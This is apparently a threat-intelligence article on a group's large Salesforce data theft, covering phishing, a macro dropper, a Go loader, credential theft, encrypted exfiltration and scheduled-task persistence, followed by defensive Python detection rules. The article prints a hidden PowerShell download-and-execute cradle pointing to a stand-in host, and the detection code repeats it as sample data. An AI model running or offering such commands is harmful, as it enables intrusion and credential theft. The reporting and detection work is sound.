Scattered Lapsus$ Hunters, a threat group previously associated with high-profile data thefts, recently claimed responsibility for exfiltrating over one billion records from Salesforce environments worldwide.
Emerging in mid-2025, the group has honed its tactics to exploit misconfigurations in cloud identities and exposed APIs.
Initial reports surfaced when multiple Salesforce customers observed anomalous queries against their customer relationship management (CRM) instances late at night, suggesting the presence of an automated extraction tool.
As forensic logs accumulated, investigators realized that the volume and scope of data accessed far exceeded previous intrusions.
In this latest campaign, attackers leveraged a combination of targeted phishing lures and credential stuffing to gain initial footholds.
Victims reported receiving authentic-looking emails prompting mandatory security updates, which delivered a malicious Office macro.
Once executed, the macro reached out to a remote command-and-control server to install a lightweight loader.
Palo Alto Networks analysts noted that this loader was written in Go and compiled with stripped symbols, making reverse engineering more challenging.
The loader subsequently validated API tokens and initiated a multi-stage data harvesting routine.
The impact of this breach extends beyond exposed personal data; proprietary sales strategies, pipeline forecasts, and sensitive client negotiations have all come under threat.
Many organizations rely heavily on Salesforce for mission-critical operations, meaning any compromise can lead to operational disruptions and reputational harm.
Early estimates suggest that the group may have extracted data at a sustained rate of over 500 gigabytes per hour, exfiltrating records in batches via encrypted channels to avoid detection.
Infection Mechanism
A closer look at the infection mechanism reveals a strategic emphasis on stealth and persistence.
After the initial macro dropper executes, a PowerShell stager is launched through a one-liner such as:
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"
This stager checks for sandbox indicators before retrieving the full Go-based loader. The loader then decrypts credentials stored in the Windows Credential Manager using the CredRead API and authenticates to the Salesforce REST API with the lowest-privilege service account that meets the data access requirements.
Once authenticated, the malware enumerates object schemas and dynamically constructs SOQL queries to retrieve and batch records. Each batch is buffered in memory and encrypted with ChaCha20 before being transmitted over HTTPS to a dedicated exfiltration endpoint.
To ensure persistence, the malware registers a scheduled task named UpdaterSvc that triggers every two hours. This task validates the presence of the loader binary, re-downloads it if altered, and resumes extraction from the last successful record ID.
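As an added, defender-side example (not code from the article or from any vendor's tooling), the following Python flags the two host-side indicators described above, a PowerShell download cradle launched hidden with an execution-policy bypass, and a scheduled task named UpdaterSvc on a two-hour trigger, against constructed process-creation and task-registration records. The record fields, the Office parent-process list and the loader path are assumptions for illustration.

```python
import re

# Constructed sample events (not real telemetry): dicts mimicking process-creation
# and scheduled-task registration records from an EDR or Sysmon-style source.
SAMPLE_EVENTS = [
    {"type": "process", "ts": "2025-09-14T02:13:07", "parent": "WINWORD.EXE",
     "cmd": 'powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
            '-Command "& {IEX ((New-Object Net.WebClient).DownloadString(\'https://cdn.example.com/stager.ps1\'))}"'},
    {"type": "process", "ts": "2025-09-14T09:00:01", "parent": "explorer.exe",
     "cmd": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"type": "task", "ts": "2025-09-14T02:14:30", "name": "UpdaterSvc",
     "interval_minutes": 120, "action": "C:\\Users\\Public\\loader.exe"},  # path assumed
    {"type": "task", "ts": "2025-09-14T10:00:00", "name": "OneDrive Update",
     "interval_minutes": 1440, "action": "C:\\Program Files\\OneDrive\\update.exe"},
]

# Download-cradle traits taken from the one-liner quoted in the article.
CRADLE_FLAGS = re.compile(r"-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass", re.I)
CRADLE_CODE = re.compile(r"\bIEX\b|Invoke-Expression|DownloadString\(", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumed macro hosts

def score_process(ev):
    """Return reasons a PowerShell launch looks like the macro-spawned stager."""
    reasons = []
    if CRADLE_FLAGS.search(ev["cmd"]) and CRADLE_CODE.search(ev["cmd"]):
        reasons.append("powershell download cradle with hidden window / policy bypass")
    if ev["parent"].lower() in OFFICE_PARENTS:
        reasons.append(f"powershell spawned by Office process {ev['parent']}")
    return reasons

def score_task(ev):
    """Return reasons a scheduled task matches the UpdaterSvc persistence pattern."""
    reasons = []
    if ev["name"].lower() == "updatersvc":
        reasons.append("task name matches reported persistence task UpdaterSvc")
    if ev["interval_minutes"] == 120 and ev["action"].lower().startswith("c:\\users\\"):
        reasons.append("2-hour repeating task running a binary from a user-writable path")
    return reasons

def find_suspicious(events):
    """Map event timestamp -> list of reasons for every event that trips a rule."""
    hits = {}
    for ev in events:
        reasons = score_process(ev) if ev["type"] == "process" else score_task(ev)
        if reasons:
            hits[ev["ts"]] = reasons
    return hits
```

Run against real telemetry, the task rule should be paired with the two-hour interval rather than the name alone, since the name is trivially changed between campaigns.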
The group’s meticulous approach to API rate-limit evasion and credential harvesting underscores an advanced understanding of cloud-native environments.
By combining sophisticated social engineering, custom tooling, and resilient persistence tactics, Scattered Lapsus$ Hunters have demonstrated a formidable capability to compromise enterprise Salesforce instances at scale.